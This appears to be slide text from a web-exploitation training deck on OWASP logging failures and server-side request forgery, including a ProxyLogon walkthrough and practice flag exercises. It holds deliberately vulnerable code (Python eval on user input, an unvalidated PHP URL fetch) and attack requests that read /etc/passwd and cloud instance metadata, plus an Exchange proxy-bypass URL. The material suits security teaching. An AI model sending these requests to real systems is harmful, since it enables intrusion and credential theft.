Practical Web Hacking and Exploitation

Part 4

A9 Security Logging and Monitoring Failures

Introduction

實際案例 - 某網站因開啟偵錯模式進而導致任意程式碼執行 (RCE)

Cont.

Cont.

Proof of Concept
















def get(self, request, *args, **kwargs):
  # org_id = request.GET.get("org_id", None)
  search = request.GET.get("search", None)
  fields = request.GET.get("fields", "['f_nickname']")
  vague = request.GET.get("vague", "False")
  page = request.GET.get("page", "1")
  page_num = request.GET.get("page_num", settings.PAGE_NUMBER)
  page = abs(int(page))
  page_num = abs(int(page_num))
  if search:
    try:
      if vague == "True":
        fields = eval(fields)
        select = """Q({0}__icontains='{1}')""".format(fields[0], search)
          ...

Cont.

Prevention

A10 Server-Side Request Forgery

Introduction

SSRF Diagram

Attack Vectors

Say, we have following vulnerable code:

Vulnerable Code

























<?php
  /**
  * Check if the 'url' GET variable is set
  * Example - http://localhost/?url=http://testphp.vulnweb.com/images/logo.gif
  */
  if (isset($_GET['url'])){
  $url = $_GET['url'];

  /**
  * Send a request vulnerable to SSRF since
  * no validation is being done on $url
  * before sending the request
  */
  $image = fopen($url, 'rb');

  /**
  * Send the correct response headers
  */
  header("Content-Type: image/png");

  /**
  * Dump the contents of the image
  */
  fpassthru($image);}

Local FIle Inclusion

Exploit

GET /?url=file:///etc/passwd HTTP/1.1
Host: example.com

Access cloud service instance metadata

Exploit

GET /?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1
Host: example.com

ProxyLogon (CVE-2021-26855)

  1. CVE-2021-26855 - Pre-auth SSRF leads to Authentication Bypass
  2. CVE-2021-27065 - Post-auth Arbitrary-File-Write leads to RCE

The CAS architecture

The CAS web proxy

1st Code Snippet

HttpProxy\ProxyRequestHandler.cs


























protected virtual Uri GetTargetBackEndServerUrl() {
    this.LogElapsedTime("E_TargetBEUrl");
    Uri result;
    try {
        UrlAnchorMailbox urlAnchorMailbox = this.AnchoredRoutingTarget.AnchorMailbox as UrlAnchorMailbox;
        if (urlAnchorMailbox != null) {
            result = urlAnchorMailbox.Url;
        } else {
            UriBuilder clientUrlForProxy = this.GetClientUrlForProxy();
            clientUrlForProxy.Scheme = Uri.UriSchemeHttps;
            clientUrlForProxy.Host = this.AnchoredRoutingTarget.BackEndServer.Fqdn;
            clientUrlForProxy.Port = 444;
            if (this.AnchoredRoutingTarget.BackEndServer.Version < Server.E15MinVersion) {
                this.ProxyToDownLevel = true;
                RequestDetailsLoggerBase<RequestDetailsLogger>.SafeAppendGenericInfo(this.Logger, "ProxyToDownLevel", true);
                clientUrlForProxy.Port = 443;
            }
            result = clientUrlForProxy.Uri;
        }
    }
    finally {
        this.LogElapsedTime("L_TargetBEUrl");
    }
    return result;
}

2nd Code Snippet

HttpProxy\OwaResourceProxyRequestHandler.cs















protected override AnchorMailbox ResolveAnchorMailbox() {
    HttpCookie httpCookie = base.ClientRequest.Cookies["X-AnonResource-Backend"];
    if (httpCookie != null) {
        this.savedBackendServer = httpCookie.Value;
    }
    if (!string.IsNullOrEmpty(this.savedBackendServer)) {
        base.Logger.Set(3, "X-AnonResource-Backend-Cookie");
        if (ExTraceGlobals.VerboseTracer.IsTraceEnabled(1)) {
            ExTraceGlobals.VerboseTracer.TraceDebug<HttpCookie, int>((long)this.GetHashCode(), "[OwaResourceProxyRequestHandler::ResolveAnchorMailbox]: AnonResourceBackend cookie used: {0}; context {1}.", httpCookie, base.TraceContext);
        }
        return new ServerInfoAnchorMailbox(BackEndServer.FromString(this.savedBackendServer), this);
    }
    return new AnonymousAnchorMailbox(this);
}

Play with Inconsistency

Exploitation

https://[foo]@example.com:443/path#]:444/owa/auth/x.js

Super SSRF

TOCTOU Attack + SSRF

DNS rebinding is a form of TOCTOU (time of check, time of use) vulnerability. By exploiting with this flaw, we can bypass lame URL use logics.

IP verification

  begin
    addrs_info = Addrinfo.getaddrinfo(uri.hostname, port, nil, :STREAM).map do |addr|
      addr.ipv6_v4mapped? ? addr.ipv6_to_ipv4 : addr
    end
  rescue SocketError
    return true
  end

  validate_localhost!(addrs_info) unless allow_localhost
  validate_loopback!(addrs_info) unless allow_localhost
  validate_local_network!(addrs_info) unless allow_local_network
  validate_link_local!(addrs_info) unless allow_local_network

  true
end

A10 - Practice 1

Get the flag

http://127.0.0.1:8106/

Hint:

A10 - Practice 2

Get the flag

http://lookup.boik.com.tw/

Appendix

URL Hacking

URL Format

How will browser act?

Punycode

IP to Octol

References

Cont.

Thank you :flushed:

boik.su@cycarrier.com